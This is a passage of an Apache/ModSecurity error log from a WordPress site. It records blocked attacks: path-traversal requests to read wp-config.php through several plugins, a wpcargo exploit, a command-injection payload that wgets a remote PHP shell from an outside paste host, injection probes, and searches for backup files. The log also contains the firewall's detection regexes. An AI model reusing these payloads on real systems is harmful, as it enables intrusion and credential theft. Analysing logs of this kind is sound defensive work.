/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"] [unique_id "Y6ACmbC12ixGp3lnJm6X4gAAANA"] [Mon Dec 19 01:20:09.937672 2022] [:error] [pid 7273:tid 139757019424512] [client 45.55.197.84:35384] [client 45.55.197.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "Y6ACmUD7aVmgLvB3RIp7wAAAAFA"] [Mon Dec 19 15:50:33.046218 2022] [:error] [pid 2580:tid 139650131756800] [client 5.161.67.187:45454] [client 5.161.67.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y6DOmfWdZfL0eqPqxMUewAAAANY"], referer: www.google.com [Mon Dec 19 15:50:33.118229 2022] [:error] [pid 1913:tid 139650356745984] [client 5.161.67.187:45456] [client 5.161.67.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y6DOmcsmXnzKTrbCoDCRCwAAAAQ"], referer: www.google.com [Mon Dec 19 15:50:59.860967 2022] [:error] [pid 2580:tid 139650148542208] [client 5.161.67.187:45552] [client 5.161.67.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y6DOs_WdZfL0eqPqxMUe0AAAANQ"], referer: www.google.com [Mon Dec 19 15:50:59.918419 2022] [:error] [pid 1913:tid 139650198898432] [client 5.161.67.187:45554] [client 5.161.67.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y6DOs8smXnzKTrbCoDCRFAAAAA4"], referer: www.google.com [Mon Dec 19 15:54:19.245458 2022] [autoindex:error] [pid 1915:tid 139650215683840] [client 118.27.30.26:45728] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/blue/index.php [Mon Dec 19 16:04:26.511247 2022] [:error] [pid 1915:tid 139650165327616] [client 5.161.67.187:46366] [client 5.161.67.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y6DR2rXWY69OCS6Da1HWZwAAAJI"], referer: www.google.com [Mon Dec 19 16:04:26.578738 2022] [:error] [pid 1913:tid 139650198898432] [client 5.161.67.187:46368] [client 5.161.67.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y6DR2ssmXnzKTrbCoDCRPAAAAA4"], referer: www.google.com [Mon Dec 19 20:00:32.909158 2022] [:error] [pid 1915:tid 139650356745984] [client 194.169.175.135:55990] [client 194.169.175.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y6EJMLXWY69OCS6Da1HZgAAAAIQ"], referer: www.google.com [Tue Dec 20 07:38:10.691006 2022] [autoindex:error] [pid 25505:tid 140345094399744] [client 194.169.175.135:53082] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Dec 20 16:35:13.082721 2022] [autoindex:error] [pid 26113:tid 140345094399744] [client 142.93.5.147:50732] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Dec 21 08:44:29.783269 2022] [autoindex:error] [pid 29798:tid 139659812218624] [client 194.169.175.135:55406] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Dec 21 10:20:38.299161 2022] [:error] [pid 29797:tid 139659862574848] [client 5.188.62.140:59942] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y6MkRl1RVMmOw6pG6__e2AAAAA0"] [Wed Dec 21 13:28:15.342456 2022] [:error] [pid 29798:tid 139659862574848] [client 188.165.157.120:38786] [client 188.165.157.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y6NQP1xpg1hOuf9B4EgdNgAAAE0"] [Wed Dec 21 19:16:49.166832 2022] [:error] [pid 30409:tid 139659837396736] [client 192.185.83.83:50318] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyfifteen/404.php:10, referer: http://simplesite.com [Wed Dec 21 19:16:49.166914 2022] [:error] [pid 30409:tid 139659837396736] [client 192.185.83.83:50318] Stack trace:, referer: http://simplesite.com [Wed Dec 21 19:16:49.166926 2022] [:error] [pid 30409:tid 139659837396736] [client 192.185.83.83:50318] #0 {main}, referer: http://simplesite.com [Wed Dec 21 19:16:49.166988 2022] [:error] [pid 30409:tid 139659837396736] [client 192.185.83.83:50318] thrown in /home/investig/public_html/wp-content/themes/twentyfifteen/404.php on line 10, referer: http://simplesite.com [Thu Dec 22 00:23:13.926581 2022] [autoindex:error] [pid 30409:tid 139660027467520] [client 199.192.19.202:58468] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Thu Dec 22 01:41:05.471423 2022] [autoindex:error] [pid 29799:tid 139659778647808] [client 85.239.243.95:60646] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Requests/Auth/index.php [Thu Dec 22 04:53:51.219864 2022] [:error] [pid 24539:tid 140002814048000] [client 5.161.109.193:39112] [client 5.161.109.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y6QpL6eq-NPHNa2mX-aE7QAAAMc"], referer: www.google.com [Thu Dec 22 04:53:51.387852 2022] [:error] [pid 23931:tid 140002755299072] [client 5.161.109.193:39114] [client 5.161.109.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y6QpL7vDkTPej3O-tUk0RwAAAE4"], referer: www.google.com [Thu Dec 22 05:57:26.095701 2022] [:error] [pid 23931:tid 140002839226112] [client 5.188.62.76:40588] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y6Q4FrvDkTPej3O-tUk0cwAAAEQ"] [Thu Dec 22 07:26:34.951845 2022] [autoindex:error] [pid 23930:tid 140002688157440] [client 194.169.175.135:42966] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Dec 22 09:54:08.336745 2022] [autoindex:error] [pid 24539:tid 140002704942848] [client 85.215.105.55:53572] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 22 09:54:09.928263 2022] [autoindex:error] [pid 24539:tid 140002822440704] [client 85.215.105.55:53574] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 22 09:54:12.145370 2022] [autoindex:error] [pid 24539:tid 140002755299072] [client 85.215.105.55:53576] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2022/12/22 09:54:20 [error] 23889#23889: *113216 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 85.215.105.55, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Thu Dec 22 09:54:54.120285 2022] [autoindex:error] [pid 24539:tid 140002830833408] [client 85.215.105.55:53592] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 22 09:55:26.075912 2022] [autoindex:error] [pid 23932:tid 140002805655296] [client 85.215.105.55:53612] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 22 10:18:53.653298 2022] [autoindex:error] [pid 23931:tid 140002679764736] [client 103.70.31.148:54162] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Thu Dec 22 11:00:08.496210 2022] [autoindex:error] [pid 23930:tid 140002730120960] [client 5.100.154.160:55312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/HTTP/index.php [Thu Dec 22 15:43:33.425907 2022] [autoindex:error] [pid 23931:tid 140002755299072] [client 91.134.248.235:47388] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Thu Dec 22 15:43:48.631102 2022] [:error] [pid 24539:tid 140002814048000] [client 3.21.102.102:47524] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y6TBhKeq-NPHNa2mX-aXQgAAAMc"] [Thu Dec 22 15:47:05.289156 2022] [:error] [pid 24539:tid 140002688157440] [client 3.21.102.102:48234] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y6TCSaeq-NPHNa2mX-aXyQAAANY"] [Thu Dec 22 15:47:29.749405 2022] [:error] [pid 23930:tid 140002704942848] [client 3.21.102.102:48306] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ 